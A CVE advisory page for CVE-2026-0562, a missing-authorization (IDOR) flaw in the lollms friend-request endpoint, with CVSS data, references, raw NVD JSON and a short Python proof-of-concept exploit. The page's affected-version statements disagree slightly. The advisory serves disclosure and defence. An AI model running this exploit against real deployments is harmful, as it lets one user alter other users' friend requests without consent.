CVE-2026-0562

Description

A critical security vulnerability in parisneo/lollms versions up to 2.2.0 allows any authenticated user to accept or reject friend requests belonging to other users. The `respond_request()` function in `backend/routers/friends.py` does not implement proper authorization checks, enabling Insecure Direct Object Reference (IDOR) attacks. Specifically, the `/api/friends/requests/{friendship_id}` endpoint fails to verify whether the authenticated user is part of the friendship or the intended recipient of the request. This vulnerability can lead to unauthorized access, privacy violations, and potential social engineering attacks. The issue has been addressed in version 2.2.0.

CVSS Details

CVSS Score

8.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:lollms:lollms:*:*:*:*:*:*:*:* - VULNERABLE

parisneo/lollms < 2.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target API endpoint
url = "http://target.com/api/friends/requests/{friendship_id}"

# Attacker's authenticated headers
headers = {
    "Authorization": "Bearer <attacker_jwt_token>",
    "Content-Type": "application/json"
}

# The ID of a friend request belonging to another victim
victim_request_id = 12345

# Payload to accept or reject the request
payload = {
    "status": "accepted"  # or "rejected"
}

# Send the malicious request
response = requests.post(url.format(friendship_id=victim_request_id), json=payload, headers=headers)

if response.status_code == 200:
    print("[+] Successfully manipulated the friend request.")
else:
    print("[-] Failed to exploit the vulnerability.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0562
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0562
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0562/
[4] VulDB https://vuldb.com/cve/CVE-2026-0562
[5] https://github.com/parisneo/lollms/commit/c46297799f8e1e23305373f8350746b905e0e83c
[6] https://huntr.com/bounties/6aab01ca-a138-4a1d-bef9-3bce145359bf
[7] https://aydinnyunus.github.io/2026/04/18/idor-lollms-friend-request-cve-2026-0562/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0562", "sourceIdentifier": "[email protected]", "published": "2026-03-29T18:16:14.460", "lastModified": "2026-04-22T16:16:52.583", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A critical security vulnerability in parisneo/lollms versions up to 2.2.0 allows any authenticated user to accept or reject friend requests belonging to other users. The `respond_request()` function in `backend/routers/friends.py` does not implement proper authorization checks, enabling Insecure Direct Object Reference (IDOR) attacks. Specifically, the `/api/friends/requests/{friendship_id}` endpoint fails to verify whether the authenticated user is part of the friendship or the intended recipient of the request. This vulnerability can lead to unauthorized access, privacy violations, and potential social engineering attacks. The issue has been addressed in version 2.2.0."}, {"lang": "es", "value": "Una vulnerabilidad de seguridad crítica en las versiones de parisneo/lollms hasta la 2.2.0 permite a cualquier usuario autenticado aceptar o rechazar solicitudes de amistad pertenecientes a otros usuarios. La función 'respond_request()' en 'backend/routers/friends.py' no implementa comprobaciones de autorización adecuadas, lo que permite ataques de Referencia Directa a Objeto Insegura (IDOR). Específicamente, el endpoint '/api/friends/requests/{friendship_id}' no verifica si el usuario autenticado es parte de la amistad o el destinatario previsto de la solicitud. Esta vulnerabilidad puede conducir a acceso no autorizado, violaciones de la privacidad y posibles ataques de ingeniería social. El problema ha sido abordado en la versión 2.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lollms:lollms:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.1.0", "matchCriteriaId": "7118851E-5C3C-499B-BBB5-0327B7FD85AF"}]}]}], "references": [{"url": "https://github.com/parisneo/lollms/commit/c46297799f8e1e23305373f8350746b905e0e83c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://huntr.com/bounties/6aab01ca-a138-4a1d-bef9-3bce145359bf", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://aydinnyunus.github.io/2026/04/18/idor-lollms-friend-request-cve-2026-0562/", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}